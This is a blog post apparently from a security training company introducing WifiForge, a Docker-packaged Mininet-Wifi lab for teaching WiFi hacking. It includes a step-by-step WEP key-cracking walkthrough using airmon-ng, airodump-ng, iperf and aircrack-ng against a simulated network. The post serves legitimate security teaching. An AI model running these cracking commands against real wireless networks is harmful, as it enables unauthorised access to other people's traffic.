WifiForge – WiFi Exploitation for the Classroom

by William Oldert // BHIS Intern

BHIS had a problem.  

We needed an environment for students to learn WiFi hacking safely. Our original solution used interconnected physical network gear and computers to create the needed signals. The requirement for multiple such setups to properly run a class with was costly, however, and transport was a concern as well.  

We discovered a program called Mininet, which creates an interactive virtual network, and began looking for ways to utilize it in labs and teaching material. Wondering if this might be the solution we were in sore need of, a project was started, and a team of interns was hired to research and test the limits. 

The product of that project is WifiForge. 

What is WifiForge? 

WifiForge is a program built on the foundation of the open-source Mininet-Wifi, itself being a branch from Mininet that includes support for wireless networking. It automatically sets up the network and tools needed to perform a variety of exploits, all packed neatly into a Docker container. WifiForge eliminates the need for physical hardware, requiring only a docker install and the execution of a couple commands. 

You can find a link to the project’s GitHub page HERE.  

Disclaimer/Notes 

  • While it is strongly recommended to run WifiForge in a Docker container, you can run it on your base machine. 
  • Installing Mininet-Wifi on the base machine has been known to cause dependency nightmares. 
  • It is suggested to run WifiForge on Ubuntu version 14.04 and up or the latest version of Kali (when Mininet was built in 2017, Ubuntu 14.04 was bleeding edge).  
  • The WifiForge installation script may disrupt normal operating system use; it is suggested to use a fresh install, virtual machine, or preferably a Docker container. 

OS Compatibility 

WifiForge should work on any Linux operating system using Docker. The following operating systems have been tested and are confirmed to work. 

Kali Linux 

Parrot OS 

Ubuntu 

Set-Up Guide 

Below is the guide to setting up a Docker container with all the required pieces and parts. We have guides for installing to a bare OS or from a Docker image. These instructions can be found on the project’s GitHub. The best and easiest option, however, is laid out below. 

Docker (recommended) 

Note: Dockerfile will fail if Mininet-Wifi is already installed locally 

Install from release 

  1. Pull the Docker image from Dockerhub and start a new container 
sudo docker run --privileged=true -it --env="DISPLAY" --env="QT_X11_NO_MITSHM=1" -v /tmp/.X11-unix:/tmp/.X11-unix:rw -v /sys/:/sys -v /lib/modules/:/lib/modules/ --name mininet-wifi --network=host --hostname mininet-wifi redblackbird/wififorge:v1.0.0 /bin/bash

Within the container, initiate the controller to simulate APs

service openvswitch-switch start

Run WifiForge.py

sudo python3 Framework/WifiForge.py

Labs and Featured Tools

WifiForge provides pre-built labs that cover a variety of topics and tools including, but not limited, to:

Today, however, we would like to give you a taste of what this program can do through our WEP key-cracking lab.

Lab: WEP Key Cracking

Setup Phase

To begin, select “WEP Network” from the WifiForge menu and allow up to 30 seconds for initialization of the network.

Once it has started, use the following command to open an xterm session on the attacker, host1, and host2.

xterm a host1 host2 
WEP Key Cracking

On the attacking machine, switch the interface to monitor mode using the following command.

airmon-ng start a-wlan0 

Successful output of the above command will appear as below.

Use airodump-ng to begin looking for nearby networks.

airodump-ng a-wlan0mon 

Wait for traffic to appear on the console as seen below.

Note the BSSID and channel before killing the process with ‘Ctrl + c’. Use this BSSID and channel in the next command.

airodump-ng –c <CHANNEL> -–bssid <BSSID> a-wlan0mon –w attack_capture 

As the above command runs, information regarding hosts connected to the target network will appear as seen below.

On host1, note the IP address associated with host1-wlan0 after running the following command.

ifconfig

The IP address can be seen highlighted in red in the screenshot below.

The WEP key will be cracked by collecting [JD1] regular user traffic. To simulate this traffic, use the following command on host1.

iperf –s

The above command will begin listening on port 5001 for traffic, as seen below.

Switch over to host2’s terminal. Run the following command.

iperf -c <HOST1 IP ADDRESS> -u -b 100M -t 60

The above command will begin sending traffic to host1. The output will be similar to the image below.

Wait until about 25,000 packets have been sent (see the Frames column in the airmon console). When this number is reached, kill the airmon-ng session on the attacker machine using ‘Ctrl + c’ and run the following command.

aircrack-ng ./attack_capture-01.cap

The above command will begin attempting to crack the WEP key. Successful decryption will be similar to the screenshot below.

To Close…

Hopefully, this lab helped to demonstrate the usefulness of WifiForge to the reader and showcase what it can be used to accomplish. Being able to spin up an environment for a class, without having to deal with the set up or any of the behind-the-scenes work, is why we built this program. Not having to dink around with hardware is a big plus too. All this in a compact Docker container means portability and scaling are not a problem either.

And, of course, WifiForge, as intended, solves BHIS’s problem quite handily.

Links and Further Reading



Ready to learn more?

Level up your skills with affordable classes from Antisyphon!

Pay-What-You-Can Training

Available live/virtual and on-demand